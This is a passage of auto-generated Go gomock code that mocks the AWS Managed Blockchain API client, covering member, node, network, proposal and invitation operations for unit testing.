// CreateProposalRequest indicates an expected call of CreateProposalRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateProposalRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateProposalRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateProposalRequest), arg0)
}
// CreateProposalWithContext mocks base method.
func (m *MockManagedBlockchainAPI) CreateProposalWithContext(arg0 context.Context, arg1 *managedblockchain.CreateProposalInput, arg2 ...request.Option) (*managedblockchain.CreateProposalOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "CreateProposalWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.CreateProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateProposalWithContext indicates an expected call of CreateProposalWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateProposalWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateProposalWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateProposalWithContext), varargs...)
}
// DeleteMember mocks base method.
func (m *MockManagedBlockchainAPI) DeleteMember(arg0 *managedblockchain.DeleteMemberInput) (*managedblockchain.DeleteMemberOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "DeleteMember", arg0)
ret0, _ := ret[0].(*managedblockchain.DeleteMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// DeleteMember indicates an expected call of DeleteMember.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteMember(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteMember", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteMember), arg0)
}
// DeleteMemberRequest mocks base method.
func (m *MockManagedBlockchainAPI) DeleteMemberRequest(arg0 *managedblockchain.DeleteMemberInput) (*request.Request, *managedblockchain.DeleteMemberOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "DeleteMemberRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.DeleteMemberOutput)
return ret0, ret1
}
// DeleteMemberRequest indicates an expected call of DeleteMemberRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteMemberRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteMemberRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteMemberRequest), arg0)
}
// DeleteMemberWithContext mocks base method.
func (m *MockManagedBlockchainAPI) DeleteMemberWithContext(arg0 context.Context, arg1 *managedblockchain.DeleteMemberInput, arg2 ...request.Option) (*managedblockchain.DeleteMemberOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "DeleteMemberWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.DeleteMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// DeleteMemberWithContext indicates an expected call of DeleteMemberWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteMemberWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteMemberWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteMemberWithContext), varargs...)
}
// DeleteNode mocks base method.
func (m *MockManagedBlockchainAPI) DeleteNode(arg0 *managedblockchain.DeleteNodeInput) (*managedblockchain.DeleteNodeOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "DeleteNode", arg0)
ret0, _ := ret[0].(*managedblockchain.DeleteNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// DeleteNode indicates an expected call of DeleteNode.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteNode(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteNode", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteNode), arg0)
}
// DeleteNodeRequest mocks base method.
func (m *MockManagedBlockchainAPI) DeleteNodeRequest(arg0 *managedblockchain.DeleteNodeInput) (*request.Request, *managedblockchain.DeleteNodeOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "DeleteNodeRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.DeleteNodeOutput)
return ret0, ret1
}
// DeleteNodeRequest indicates an expected call of DeleteNodeRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteNodeRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteNodeRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteNodeRequest), arg0)
}
// DeleteNodeWithContext mocks base method.
func (m *MockManagedBlockchainAPI) DeleteNodeWithContext(arg0 context.Context, arg1 *managedblockchain.DeleteNodeInput, arg2 ...request.Option) (*managedblockchain.DeleteNodeOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "DeleteNodeWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.DeleteNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// DeleteNodeWithContext indicates an expected call of DeleteNodeWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteNodeWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteNodeWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteNodeWithContext), varargs...)
}
// GetMember mocks base method.
func (m *MockManagedBlockchainAPI) GetMember(arg0 *managedblockchain.GetMemberInput) (*managedblockchain.GetMemberOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetMember", arg0)
ret0, _ := ret[0].(*managedblockchain.GetMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetMember indicates an expected call of GetMember.
func (mr *MockManagedBlockchainAPIMockRecorder) GetMember(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetMember", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetMember), arg0)
}
// GetMemberRequest mocks base method.
func (m *MockManagedBlockchainAPI) GetMemberRequest(arg0 *managedblockchain.GetMemberInput) (*request.Request, *managedblockchain.GetMemberOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetMemberRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.GetMemberOutput)
return ret0, ret1
}
// GetMemberRequest indicates an expected call of GetMemberRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) GetMemberRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetMemberRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetMemberRequest), arg0)
}
// GetMemberWithContext mocks base method.
func (m *MockManagedBlockchainAPI) GetMemberWithContext(arg0 context.Context, arg1 *managedblockchain.GetMemberInput, arg2 ...request.Option) (*managedblockchain.GetMemberOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "GetMemberWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.GetMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetMemberWithContext indicates an expected call of GetMemberWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) GetMemberWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetMemberWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetMemberWithContext), varargs...)
}
// GetNetwork mocks base method.
func (m *MockManagedBlockchainAPI) GetNetwork(arg0 *managedblockchain.GetNetworkInput) (*managedblockchain.GetNetworkOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetNetwork", arg0)
ret0, _ := ret[0].(*managedblockchain.GetNetworkOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetNetwork indicates an expected call of GetNetwork.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNetwork(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNetwork", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNetwork), arg0)
}
// GetNetworkRequest mocks base method.
func (m *MockManagedBlockchainAPI) GetNetworkRequest(arg0 *managedblockchain.GetNetworkInput) (*request.Request, *managedblockchain.GetNetworkOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetNetworkRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.GetNetworkOutput)
return ret0, ret1
}
// GetNetworkRequest indicates an expected call of GetNetworkRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNetworkRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNetworkRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNetworkRequest), arg0)
}
// GetNetworkWithContext mocks base method.
func (m *MockManagedBlockchainAPI) GetNetworkWithContext(arg0 context.Context, arg1 *managedblockchain.GetNetworkInput, arg2 ...request.Option) (*managedblockchain.GetNetworkOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "GetNetworkWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.GetNetworkOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetNetworkWithContext indicates an expected call of GetNetworkWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNetworkWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNetworkWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNetworkWithContext), varargs...)
}
// GetNode mocks base method.
func (m *MockManagedBlockchainAPI) GetNode(arg0 *managedblockchain.GetNodeInput) (*managedblockchain.GetNodeOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetNode", arg0)
ret0, _ := ret[0].(*managedblockchain.GetNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetNode indicates an expected call of GetNode.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNode(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNode", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNode), arg0)
}
// GetNodeRequest mocks base method.
func (m *MockManagedBlockchainAPI) GetNodeRequest(arg0 *managedblockchain.GetNodeInput) (*request.Request, *managedblockchain.GetNodeOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetNodeRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.GetNodeOutput)
return ret0, ret1
}
// GetNodeRequest indicates an expected call of GetNodeRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNodeRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNodeRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNodeRequest), arg0)
}
// GetNodeWithContext mocks base method.
func (m *MockManagedBlockchainAPI) GetNodeWithContext(arg0 context.Context, arg1 *managedblockchain.GetNodeInput, arg2 ...request.Option) (*managedblockchain.GetNodeOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "GetNodeWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.GetNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetNodeWithContext indicates an expected call of GetNodeWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNodeWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNodeWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNodeWithContext), varargs...)
}
// GetProposal mocks base method.
func (m *MockManagedBlockchainAPI) GetProposal(arg0 *managedblockchain.GetProposalInput) (*managedblockchain.GetProposalOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetProposal", arg0)
ret0, _ := ret[0].(*managedblockchain.GetProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetProposal indicates an expected call of GetProposal.
func (mr *MockManagedBlockchainAPIMockRecorder) GetProposal(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetProposal", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetProposal), arg0)
}
// GetProposalRequest mocks base method.
func (m *MockManagedBlockchainAPI) GetProposalRequest(arg0 *managedblockchain.GetProposalInput) (*request.Request, *managedblockchain.GetProposalOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetProposalRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.GetProposalOutput)
return ret0, ret1
}
// GetProposalRequest indicates an expected call of GetProposalRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) GetProposalRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetProposalRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetProposalRequest), arg0)
}
// GetProposalWithContext mocks base method.
func (m *MockManagedBlockchainAPI) GetProposalWithContext(arg0 context.Context, arg1 *managedblockchain.GetProposalInput, arg2 ...request.Option) (*managedblockchain.GetProposalOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "GetProposalWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.GetProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetProposalWithContext indicates an expected call of GetProposalWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) GetProposalWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetProposalWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetProposalWithContext), varargs...)
}
// ListInvitations mocks base method.
func (m *MockManagedBlockchainAPI) ListInvitations(arg0 *managedblockchain.ListInvitationsInput) (*managedblockchain.ListInvitationsOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListInvitations", arg0)
ret0, _ := ret[0].(*managedblockchain.ListInvitationsOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListInvitations indicates an expected call of ListInvitations.
func (mr *MockManagedBlockchainAPIMockRecorder) ListInvitations(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListInvitations", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListInvitations), arg0)
}
// ListInvitationsPages mocks base method.
func (m *MockManagedBlockchainAPI) ListInvitationsPages(arg0 *managedblockchain.ListInvitationsInput, arg1 func(*managedblockchain.ListInvitationsOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListInvitationsPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListInvitationsPages indicates an expected call of ListInvitationsPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListInvitationsPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListInvitationsPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListInvitationsPages), arg0, arg1)
}
// ListInvitationsPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListInvitationsPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListInvitationsInput, arg2 func(*managedblockchain.ListInvitationsOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListInvitationsPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListInvitationsPagesWithContext indicates an expected call of ListInvitationsPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListInvitationsPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListInvitationsPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListInvitationsPagesWithContext), varargs...)
}
// ListInvitationsRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListInvitationsRequest(arg0 *managedblockchain.ListInvitationsInput) (*request.Request, *managedblockchain.ListInvitationsOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListInvitationsRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListInvitationsOutput)
return ret0, ret1
}
// ListInvitationsRequest indicates an expected call of ListInvitationsRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListInvitationsRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListInvitationsRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListInvitationsRequest), arg0)
}
// ListInvitationsWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListInvitationsWithContext(arg0 context.Context, arg1 *managedblockchain.ListInvitationsInput, arg2 ...request.Option) (*managedblockchain.ListInvitationsOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListInvitationsWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListInvitationsOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListInvitationsWithContext indicates an expected call of ListInvitationsWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListInvitationsWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListInvitationsWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListInvitationsWithContext), varargs...)
}
// ListMembers mocks base method.
func (m *MockManagedBlockchainAPI) ListMembers(arg0 *managedblockchain.ListMembersInput) (*managedblockchain.ListMembersOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListMembers", arg0)
ret0, _ := ret[0].(*managedblockchain.ListMembersOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListMembers indicates an expected call of ListMembers.
func (mr *MockManagedBlockchainAPIMockRecorder) ListMembers(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListMembers", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListMembers), arg0)
}
// ListMembersPages mocks base method.
func (m *MockManagedBlockchainAPI) ListMembersPages(arg0 *managedblockchain.ListMembersInput, arg1 func(*managedblockchain.ListMembersOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListMembersPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListMembersPages indicates an expected call of ListMembersPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListMembersPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListMembersPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListMembersPages), arg0, arg1)
}
// ListMembersPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListMembersPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListMembersInput, arg2 func(*managedblockchain.ListMembersOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListMembersPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListMembersPagesWithContext indicates an expected call of ListMembersPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListMembersPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListMembersPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListMembersPagesWithContext), varargs...)
}
// ListMembersRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListMembersRequest(arg0 *managedblockchain.ListMembersInput) (*request.Request, *managedblockchain.ListMembersOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListMembersRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListMembersOutput)
return ret0, ret1
}
// ListMembersRequest indicates an expected call of ListMembersRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListMembersRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListMembersRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListMembersRequest), arg0)
}
// ListMembersWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListMembersWithContext(arg0 context.Context, arg1 *managedblockchain.ListMembersInput, arg2 ...request.Option) (*managedblockchain.ListMembersOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListMembersWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListMembersOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListMembersWithContext indicates an expected call of ListMembersWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListMembersWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListMembersWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListMembersWithContext), varargs...)
}
// ListNetworks mocks base method.
func (m *MockManagedBlockchainAPI) ListNetworks(arg0 *managedblockchain.ListNetworksInput) (*managedblockchain.ListNetworksOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNetworks", arg0)
ret0, _ := ret[0].(*managedblockchain.ListNetworksOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListNetworks indicates an expected call of ListNetworks.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNetworks(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNetworks", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNetworks), arg0)
}
// ListNetworksPages mocks base method.
func (m *MockManagedBlockchainAPI) ListNetworksPages(arg0 *managedblockchain.ListNetworksInput, arg1 func(*managedblockchain.ListNetworksOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNetworksPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListNetworksPages indicates an expected call of ListNetworksPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNetworksPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNetworksPages", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNetworksPages), arg0, arg1)
}
// ListNetworksPagesWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListNetworksPagesWithContext(arg0 context.Context, arg1 *managedblockchain.ListNetworksInput, arg2 func(*managedblockchain.ListNetworksOutput, bool) bool, arg3 ...request.Option) error {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1, arg2}
for _, a := range arg3 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListNetworksPagesWithContext", varargs...)
ret0, _ := ret[0].(error)
return ret0
}
// ListNetworksPagesWithContext indicates an expected call of ListNetworksPagesWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNetworksPagesWithContext(arg0, arg1, arg2 interface{}, arg3 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1, arg2}, arg3...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNetworksPagesWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNetworksPagesWithContext), varargs...)
}
// ListNetworksRequest mocks base method.
func (m *MockManagedBlockchainAPI) ListNetworksRequest(arg0 *managedblockchain.ListNetworksInput) (*request.Request, *managedblockchain.ListNetworksOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNetworksRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.ListNetworksOutput)
return ret0, ret1
}
// ListNetworksRequest indicates an expected call of ListNetworksRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNetworksRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNetworksRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNetworksRequest), arg0)
}
// ListNetworksWithContext mocks base method.
func (m *MockManagedBlockchainAPI) ListNetworksWithContext(arg0 context.Context, arg1 *managedblockchain.ListNetworksInput, arg2 ...request.Option) (*managedblockchain.ListNetworksOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "ListNetworksWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.ListNetworksOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListNetworksWithContext indicates an expected call of ListNetworksWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNetworksWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNetworksWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNetworksWithContext), varargs...)
}
// ListNodes mocks base method.
func (m *MockManagedBlockchainAPI) ListNodes(arg0 *managedblockchain.ListNodesInput) (*managedblockchain.ListNodesOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNodes", arg0)
ret0, _ := ret[0].(*managedblockchain.ListNodesOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// ListNodes indicates an expected call of ListNodes.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNodes(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListNodes", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).ListNodes), arg0)
}
// ListNodesPages mocks base method.
func (m *MockManagedBlockchainAPI) ListNodesPages(arg0 *managedblockchain.ListNodesInput, arg1 func(*managedblockchain.ListNodesOutput, bool) bool) error {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "ListNodesPages", arg0, arg1)
ret0, _ := ret[0].(error)
return ret0
}
// ListNodesPages indicates an expected call of ListNodesPages.
func (mr *MockManagedBlockchainAPIMockRecorder) ListNodesPages(arg0, arg1 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
